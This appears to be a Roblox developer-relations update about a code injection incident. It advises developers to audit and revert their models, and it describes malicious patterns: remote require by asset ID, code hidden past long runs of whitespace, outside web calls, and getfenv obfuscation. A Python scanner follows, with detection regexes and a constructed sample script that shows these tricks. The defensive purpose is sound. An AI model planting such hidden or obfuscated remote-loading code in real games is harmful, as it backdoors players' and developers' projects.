Hey Developers,
We want to provide you with the latest update regarding the code injection incident of Sept. 7-8 that we communicated to you a couple of weeks ago: Recent Roblox Security Incident.
Many of you asked what we are doing to lock down the servers and what extra security measures we will put in place going forward. The goal of this post is to update you on what we have done so far to improve the security of the games created by our developer community. Here are a couple of the actionable items we have already addressed:
- Completed a security audit of our infrastructure.
- Deployed continuous automated auditing and scanning of our systems.
We will continue to work through our security roadmap to mitigate potential security events in the future. Our priority is to keep open communication channels between our developer community and Roblox. If you have information for us about a security vulnerability in the future, please reach out to us directly and our team will actively collaborate with you to address it.
The insecure server was addressed immediately upon discovery, and we are continuing to address the systemic issues behind it. Here is what we learned from the incident:
- A handful of games were confirmed to have malicious code changes.
- We have identified a pattern from these incidents that we are applying to our filters and to other potentially affected cases. If you have previously received an email from us saying that your place may have been impacted, we strongly encourage you to review your code and models carefully.
- We are aware of a few cases where models were impacted by unexpected code changes. Please keep in mind the potential impact of a malicious model: it carries its scripts into every place it is inserted into. We strongly encourage you to begin auditing the code in models created by you or by others. Review the code in your models for changes and, if you are not sure, revert to a version saved before Sept. 7.
- Remember that you can see the version history of a model by configuring it. The version history appears at the bottom of the model's configure page.
Simply click [ Make Current ] next to an earlier version to switch your model back to it.
- Along with your own models, we recommend checking any models made by other developers that you use in your games. The guidelines below will help you keep an eye out for malicious code.
- We are evaluating all reports related to this incident. If you discover any suspicious changes, please report those to us right away through devrelations@roblox.com so we can add those as part of the ongoing investigation on this incident.
- We have and will continue to do everything we can to reduce the risk from this incident. We ask you to be proactive in inspecting your code and models and reporting anything suspicious to us.
When you investigate your code (in your own scripts or in models), there are some common patterns to look out for:
- Insertion of arbitrary models, either through InsertService or through require() called with an asset ID. A module loaded by asset ID runs whatever its owner has most recently published, not a copy frozen in your place, so make sure you know every asset that is inserted into your game and who controls it.
- Lots of spaces. Sometimes a malicious coder pushes inserted text far to the right with a long run of spaces so it is not visible when simply scrolling through the file. Look for lines that are much longer than the rest of the script, or scroll the editor to the right.
- HttpService. Be on the lookout for any web calls (GetAsync, PostAsync, RequestAsync) made to external services that you do not control, since these can fetch and execute code after your review.
- getfenv calls. getfenv returns the script's environment table, and indexing it with a constructed string lets an attacker reach functions such as require or the ones above without those names ever appearing in plain text. Keep an eye out for any code that uses this function, particularly when the string it is indexed with is long and complicated or built from escape sequences (for example "\114\101...").
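The four patterns above can be checked mechanically once your scripts are exported as plain text (for example with a Rojo-style sync or by copying them out of Studio). The scanner below is an added example, not tooling from Roblox or from the original post; its rule names, regexes, the 40-space threshold and the constructed sample script are all this example's own assumptions and should be tuned to your code base.

```python
"""Scan exported Roblox Lua scripts for the suspicious patterns listed above."""
import re

# Rule names and regexes are this example's own choices, built from the four
# bullets in the post; they are assumptions, not an official signature set.
RULES = {
    "insert_service": re.compile(r"\bInsertService\b"),
    # require(<number>) loads a ModuleScript by asset ID, so the code that runs
    # is whatever the asset's owner has published, not what is in your place.
    "require_asset_id": re.compile(r"\brequire\s*\(\s*\d+\s*\)"),
    "http_service": re.compile(
        r"\bHttpService\b|\b(Get|Post|Request)Async\b|https?://", re.I),
    "getfenv": re.compile(r"\bgetfenv\b"),
}
NOTES = {
    "insert_service": "asset inserted at run time; confirm the asset ID and its owner",
    "require_asset_id": "module fetched by asset ID; its owner can change it at any time",
    "http_service": "outbound web call; confirm the host is one you control",
    "getfenv": "environment lookup; check what string it is indexed with",
}
# A run of 40+ spaces or tabs between two visible tokens on one line: the code
# after the gap sits off-screen to the right in the script editor.
HIDDEN_GAP = re.compile(r"\S[ \t]{40,}\S")
# Four or more Lua decimal escapes in a row ("\114\101\113...") spell out an
# identifier without that identifier ever appearing in plain text.
ESCAPED_BYTES = re.compile(r"(\\\d{1,3}){4,}")


def decode_lua_escapes(text):
    """Turn Lua decimal escapes such as "\\114\\101" into the characters they encode."""
    return re.sub(r"\\(\d{1,3})", lambda m: chr(int(m.group(1))), text)


def scan_lua(source):
    """Return one finding dict per (line, rule) hit, in file order."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        # Collapse whitespace runs so a hidden-gap line still shows its tail.
        snippet = re.sub(r"[ \t]{2,}", " ", line.strip())[:80]
        for rule, rx in RULES.items():
            if not rx.search(line):
                continue
            severity, note = "review", NOTES[rule]
            if rule == "require_asset_id":
                severity = "high"
            escaped = ESCAPED_BYTES.search(line)
            if rule == "getfenv" and escaped:
                # getfenv plus an escaped-byte string is the obfuscation shape
                # the post describes; show what the string actually spells.
                severity = "high"
                note = "escaped string decodes to: " + decode_lua_escapes(escaped.group(0))
            findings.append({"line": lineno, "rule": rule, "severity": severity,
                             "snippet": snippet, "note": note})
        if HIDDEN_GAP.search(line):
            findings.append({"line": lineno, "rule": "hidden_whitespace", "severity": "high",
                             "snippet": snippet,
                             "note": "code hidden past a long run of whitespace"})
    return findings


def rules_triggered(source):
    """Convenience view: the set of rule names that fired for this source."""
    return {f["rule"] for f in scan_lua(source)}


# Constructed sample script (not a real payload) exercising every rule above.
SAMPLE_SCRIPT = "\n".join([
    'local Players = game:GetService("Players")',
    'Players.PlayerAdded:Connect(function(p) print("hello " .. p.Name) end)',
    'local cfg = {speed = 16}' + " " * 120 + 'require(1234567890)',
    'game:GetService("InsertService"):LoadAsset(987654321).Parent = workspace',
    'local r = game:GetService("HttpService"):GetAsync("http://example.invalid/p")',
    'local f = getfenv()["\\114\\101\\113\\117\\105\\114\\101"]',  # spells "require"
])

if __name__ == "__main__":
    for f in scan_lua(SAMPLE_SCRIPT):
        print(f"line {f['line']:>3} [{f['severity']}] {f['rule']}: {f['note']}\n    {f['snippet']}")
```

Run it over every exported .lua file and treat each finding as something to explain, not necessarily as malware: legitimate games use HttpService and InsertService too. The point is that every hit should correspond to code you wrote and an asset or host you control; anything you cannot account for is what to report.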
We want to assure you that we take incidents such as this one very seriously. We are actively working to close this particular issue and we will continue to look for other holes and exploits in the platform. Our goal is to prevent as many issues as we can and to respond quickly and efficiently to the ones we cannot prevent. The engagement of our community is key to the success and security of our platform, so we strongly encourage everyone to keep reporting issues like these directly to us. Please let us know if you have any further questions or concerns.
Thanks,
Developer Relations Team